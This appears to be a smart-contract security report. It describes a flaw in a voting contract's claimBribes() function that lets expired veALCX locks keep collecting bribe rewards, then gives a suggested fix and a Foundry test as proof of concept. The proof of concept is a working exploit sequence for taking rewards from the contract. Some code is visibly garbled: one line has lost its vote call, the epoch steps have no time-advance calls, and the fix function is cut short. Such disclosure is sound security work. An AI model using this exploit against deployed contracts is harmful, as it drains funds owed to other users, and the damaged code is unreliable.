This report is so short because the bug is straightforward to explain and prove.
Vulnerability Details
Expired locks can keep claiming rewards for any bribe.
Recommended Fix
The fix requires checking that block.timestamp is larger than the lock's expiration date when claiming bribes using the claimBribes(...) function in the Voter smart contract.
The permanently fixed function is:
function claimBribes(address[] memory _bribes, address[][] memory _tokens, uint256 _tokenId) external {
require(IVotingEscrow(veALCX).isApprovedOrOwner(msg.sender, _tokenId));
require(IVotingEscrow(veALCX).lockEnd(_tokenId) > block.timestamp, "token expired");
for (uint256 i = 0; i < _bribes.length; i++) {
IBribe(_bribes[i]).getRewardForOwner(_tokenId, _tokens[i]);
Stealing bribe rewards using expired tokens can lead to solvency issues.
Proof of Concept
This proof of concept can be added to src/test/Voting.t.sol. It demonstrates how a user can create a lock for a min. of 1 epoch, and keep claiming rewards forever (even after expired).
function testClaimingBribesWithExpiredLock() public {
// User 1
uint256 tokenId1 = createVeAlcx(holder, TOKEN_1, nextEpoch, false);
address bribeAddress = voter.bribes(address(sushiGauge));
// Add BAL bribes to sushiGauge
createThirdPartyBribe(bribeAddress, bal, TOKEN_100K);
address[] memory pools = new address[](1);
pools[0] = sushiPoolAddress;
uint256[] memory weights = new uint256[](1);
weights[0] = 10000;
address[] memory bribes = new address[](1);
bribes[0] = address(bribeAddress);
address[][] memory tokens = new address[][](1);
tokens[0] = new address[](1);
tokens[0][0] = bal;
// Step 1- Holder votes
hevm.prank(holder);, pools, weights, 0);
console2.log("bal balance of holder before voting", IERC20(bal).balanceOf(holder));
// Step 2- Start second epoch
createThirdPartyBribe(bribeAddress, bal, TOKEN_100K);
bool expired = veALCX.lockEnd(tokenId1) < block.timestamp;
assertEq(expired, true, "token should be expired");
// Step 3- Holder claims
voter.claimBribes(bribes, tokens, tokenId1);
// Step 4- Start third epoch
createThirdPartyBribe(bribeAddress, bal, TOKEN_100K);
// Step 5- Holder claims
voter.claimBribes(bribes, tokens, tokenId1);
console2.log("bal balance of holder after voting", IERC20(bal).balanceOf(holder));